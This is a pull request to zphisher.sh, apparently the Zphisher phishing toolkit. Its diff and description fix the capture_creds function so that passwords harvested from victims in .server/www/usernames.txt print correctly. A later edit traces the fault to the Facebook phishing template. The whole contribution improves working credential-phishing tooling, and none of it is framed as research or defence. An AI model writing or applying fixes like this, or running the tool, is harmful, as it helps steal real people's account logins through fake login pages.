### PR TITLE
Graphical bug in Zphisher.sh

### DIFF
--- a/zphisher.sh
+++ b/zphisher.sh
@@ -357,7 +357,7 @@ capture_ip() {
 ## Get credentials
 capture_creds() {
 	ACCOUNT=$(grep -o 'Username:.*' .server/www/usernames.txt | cut -d " " -f2)
-	PASSWORD=$(grep -o 'Pass:.*' .server/www/usernames.txt | cut -d ":" -f2)
+	PASSWORD=$(grep -o 'Password:.*' .server/www/usernames.txt | cut -d " " -f2)
 	IFS=$'\n'
 	echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Account : ${BLUE}$ACCOUNT"
 	echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Password : ${BLUE}$PASSWORD"


### PR DESCRIPTION
On line 360 ​​of zphisher.sh
PASSWORD=$(grep -o 'Pass:.*' .server/www/usernames.txt | cut -d ":" -f2)
there is a bug that cannot get the password obtained in the shell to print.
To see the password we need to change the line of code to:
PASSWORD=$(grep -o 'Password:.*' .server/www/usernames.txt | cut -d " " -f2)

------------------------------------------------------------------------------------------------------------------------------
Edit:
This error appears only with Facebook login and not with other login, so your code in Zphisher.sh is correct but there is an error in Facebook files

![Error](https://user-images.githubusercontent.com/57435273/157228125-d7a6c4cf-8431-4fdd-a114-37fad916e493.png)

